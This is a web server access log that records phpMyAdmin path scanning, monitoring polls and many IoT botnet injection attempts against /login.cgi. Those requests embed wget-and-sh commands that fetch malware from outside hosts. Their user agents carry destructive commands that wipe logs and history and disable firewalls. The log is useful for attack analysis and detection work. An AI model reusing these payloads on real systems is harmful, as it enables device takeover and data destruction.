138.99.7.4 - - [01/Nov/2018:09:20:55 +0100] "GET /myadmin2/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
138.99.7.4 - - [01/Nov/2018:09:20:55 +0100] "GET /xampp/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
138.99.7.4 - - [01/Nov/2018:09:20:55 +0100] "GET /phpMyadmin_bak/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
138.99.7.4 - - [01/Nov/2018:09:20:55 +0100] "GET /www/phpMyAdmin/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
138.99.7.4 - - [01/Nov/2018:09:20:56 +0100] "GET /tools/phpMyAdmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
138.99.7.4 - - [01/Nov/2018:09:20:56 +0100] "GET /phpmyadmin-old/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
138.99.7.4 - - [01/Nov/2018:09:20:56 +0100] "GET /phpMyAdminold/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
138.99.7.4 - - [01/Nov/2018:09:20:57 +0100] "GET /phpMyAdmin.old/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
138.99.7.4 - - [01/Nov/2018:09:20:57 +0100] "GET /pma-old/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
138.99.7.4 - - [01/Nov/2018:09:20:57 +0100] "GET /claroline/phpMyAdmin/index.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
138.99.7.4 - - [01/Nov/2018:09:20:57 +0100] "GET /typo3/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
138.99.7.4 - - [01/Nov/2018:09:20:58 +0100] "GET /phpma/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
138.99.7.4 - - [01/Nov/2018:09:20:58 +0100] "GET /phpmyadmin/phpmyadmin/index.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
138.99.7.4 - - [01/Nov/2018:09:20:58 +0100] "GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
138.99.7.4 - - [01/Nov/2018:09:20:58 +0100] "GET /phpMyAbmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
138.99.7.4 - - [01/Nov/2018:09:20:59 +0100] "GET /phpMyAdmin__/index.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
138.99.7.4 - - [01/Nov/2018:09:20:59 +0100] "GET /phpMyAdmin+++---/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
138.99.7.4 - - [01/Nov/2018:09:20:59 +0100] "GET /v/index.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
138.99.7.4 - - [01/Nov/2018:09:21:00 +0100] "GET /phpmyadm1n/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
138.99.7.4 - - [01/Nov/2018:09:21:00 +0100] "GET /phpMyAdm1n/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
138.99.7.4 - - [01/Nov/2018:09:21:00 +0100] "GET /shaAdmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
138.99.7.4 - - [01/Nov/2018:09:21:01 +0100] "GET /phpMyadmi/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
138.99.7.4 - - [01/Nov/2018:09:21:01 +0100] "GET /phpMyAdmion/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
138.99.7.4 - - [01/Nov/2018:09:21:01 +0100] "GET /MyAdmin/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
138.99.7.4 - - [01/Nov/2018:09:21:01 +0100] "GET /phpMyAdmin1/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
212.91.246.72 - - [01/Nov/2018:09:21:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:09:22:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.128.155.28 - - [01/Nov/2018:09:23:38 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:09:23:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
153.196.136.4 - - [01/Nov/2018:09:24:06 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://206.189.165.45/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:09:24:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
108.59.8.70 - - [01/Nov/2018:09:25:41 +0100] "GET /robots.txt HTTP/1.1" 404 330 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
108.59.8.70 - - [01/Nov/2018:09:25:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
212.91.246.72 - - [01/Nov/2018:09:25:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
197.32.214.189 - - [01/Nov/2018:09:26:22 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
113.37.109.105 - - [01/Nov/2018:09:26:45 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://76.74.177.230/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:09:26:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:09:27:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:09:28:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
197.32.79.217 - - [01/Nov/2018:09:29:01 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
197.38.62.162 - - [01/Nov/2018:09:29:41 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:09:29:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
156.205.79.187 - - [01/Nov/2018:09:30:30 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:09:30:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:09:31:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
125.9.159.68 - - [01/Nov/2018:09:32:30 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://76.74.177.230/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:09:32:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
41.235.18.16 - - [01/Nov/2018:09:33:32 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:09:33:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:09:34:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:09:35:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:09:36:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
68.183.26.48 - - [01/Nov/2018:09:36:54 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:09:37:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:09:38:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.76.230.196 - - [01/Nov/2018:09:39:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:09:39:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
156.204.240.183 - - [01/Nov/2018:09:40:02 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:09:40:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
91.187.223.177 - - [01/Nov/2018:09:40:46 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Nov/2018:09:41:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.106.30.122 - - [01/Nov/2018:09:42:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Nov/2018:09:42:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
68.183.101.207 - - [01/Nov/2018:09:42:46 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
41.37.100.137 - - [01/Nov/2018:09:42:56 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
193.106.30.122 - - [01/Nov/2018:09:43:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
156.222.115.232 - - [01/Nov/2018:09:43:38 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:09:43:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:09:44:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:09:45:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:09:46:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
148.251.178.205 - - [01/Nov/2018:09:46:58 +0100] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)"
193.106.30.122 - - [01/Nov/2018:09:47:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
219.106.27.213 - - [01/Nov/2018:09:47:20 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://206.189.165.45/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
156.220.250.208 - - [01/Nov/2018:09:47:29 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:09:47:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:09:48:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
122.22.223.254 - - [01/Nov/2018:09:48:55 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.111.168/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:09:49:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
101.140.137.69 - - [01/Nov/2018:09:49:49 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://76.74.177.230/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
79.50.144.124 - - [01/Nov/2018:09:49:57 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.244.25.131/bins.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
197.32.214.189 - - [01/Nov/2018:09:50:41 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:09:50:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
61.125.77.137 - - [01/Nov/2018:09:51:32 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://212.237.32.62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 329 "-" "LMAO/2.0"
212.91.246.72 - - [01/Nov/2018:09:51:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
123.207.248.71 - - [01/Nov/2018:09:52:16 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://50.115.166.136/hakai.mips%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Nov/2018:09:52:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:09:53:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:09:54:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:09:55:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.3.60 - - [01/Nov/2018:09:55:55 +0100] "PROPFIND / HTTP/1.1" 405 339 "-" "-"
132.232.3.60 - - [01/Nov/2018:09:55:55 +0100] "GET /webdav/ HTTP/1.1" 404 312 "-" "Mozilla/5.0"
162.213.38.53 - - [01/Nov/2018:09:55:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
132.232.3.60 - - [01/Nov/2018:09:55:59 +0100] "GET /index.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
